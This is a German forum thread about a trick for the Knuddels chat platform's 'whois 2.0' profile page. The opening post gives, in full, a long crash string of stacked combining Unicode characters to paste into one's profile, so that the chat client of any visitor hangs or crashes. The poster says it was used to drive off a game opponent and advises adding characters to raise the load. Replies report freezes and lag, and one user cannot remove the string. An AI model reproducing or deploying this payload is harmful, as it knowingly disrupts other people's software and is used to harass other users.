Seite 1 von 3 123 Letzte

Ausrufezeichen whois 2.0, kleiner Trick.

Hier nun ein kleiner Trick, beachtet bitte folgendes(nichts besonderes):

Es handelt sich hierbei vermutlich um das Ausnutzen von einem Fehler, gebt also acht auf Knuddels-ADMINS. Es ist aber kein richtiger Bug. Ausserdem kann es sein das dies nur auf Windows Betriebssystem funktioniert, ist nur auf W7/vista tested.

Ich möchte vorab auch sagen das ich solche Posts garnicht erst lesen will, "ääähhh## funqt nicht, hus0" oder like "spasti, is kein bug" (ich habe nie behauptet das es funktioniert, sondern ledeglich das ihr es ja mal testen könnt.

Kommen wir nun zum mehr oder weniger Fehlern.

Wir brauchen:

• Einen Nick

Wir kopieren dies hier in den Wildspace:

[HIDE=3]
    PHP-Code:
    °300°°R°ۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููููููุุุุุูููููููۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗٴٴٴۖۖۖۗۗۗۗۖۖۖۗۗۗٴٴٴۖۖۖۗۗۗۗۗۗٴٴٴۖۖۗۗ             ##            °B60°SCANN0R 
    [/HIDE]

Wir klicken zum Abschluss auf speichern, und erfreuen uns, wenn jemand unser Profil aufruft das der Client crasht. (wenns geht)

Die Zeichen sind noch nicht alle verbraucht also ihr könnt noch weitere Schriften hinzufügen
    um die Belastung zu erhöhen. Was-Wie passiert hängt vom jeweiligen Computer ab. :S ..

Gerade auch beim Billardspielen getestet. Ein Spiel eröffnet, danach angefangen zu spielen... dann merkte ich fuck: "ich bin ein noob der kein billard kann!" - ich habe meinen Gegner kurz mit einem Profillink auf meinem Profil aufmerksam gemacht, und weg war er *gg* (°B°_°>/W<°)

sample: /w scann0r

Standard whois 2.0, kleiner Trick.

Win 7 - don't work. (wollt ich nur ma sagen)
    Hängt nur extrem.^^
    BILD ANZEIGEN [Warum wird das Bild nicht angezeigt?]
    Das ist mein Nebulak
    Möchtest du es besuchen? Dann klicke hier: Klick

Zitat Zitat von Eliteterror Beitrag anzeigen
    Die Zeichen sind noch nicht alle verbraucht also ihr könnt noch weitere Schriften hinzufügen
    um die Belastung zu erhöhen.

Je nachdem wie Stark der PC ist schmiert der Client ab, oder auch nicht.

Wie man auch dem Zitat entnehmen kann. )

Also bei mir hängt es sich auf, ganze Chat hängt, sobald das Profil geschlossen wurde läuft es aber weiter. Also geht zum Teil, bei schwächeren PC's schmiert es sicherlich ab.
    Win 7, 6GB Ram, 2x 3GHz CPU

MfG Apfel
    Fake News Verbreiter

Die neue Whois 2.0 ist so sehr umfangreich, dass dort noch mehr Bugs folgen werden, da bin ich mir sicher.

Also ich habe nen Holz Pc und da hat es nur seher krass gelaagt aber nicht abgeschmiert.

win xp, 512mb ram,1.50 ghz

i7 und VDSL 50 und das Profil wird sofort geladen.

Acer Preadator G3610
    Pc fängt an zu hängen (von mir wenn ich es drin habe)
    Mein Freund hatte rein garnichts.
    Also lastet es schonmal aus aber führt wohl eher nicht zum Absturz

Hängt ziemlich bei mir, kann mir denn einer sagen wie ich das wieder weg bekomme? xD
    Sobald ich "Bearbeiten" anklicke und auf Wildspace gehe hängt sich das auf ^^

Mit dem Löschen ist ne blöde Sache. Ich bekomms nicht mehr raus. LOL

Seite 1 von 3 123 Letzte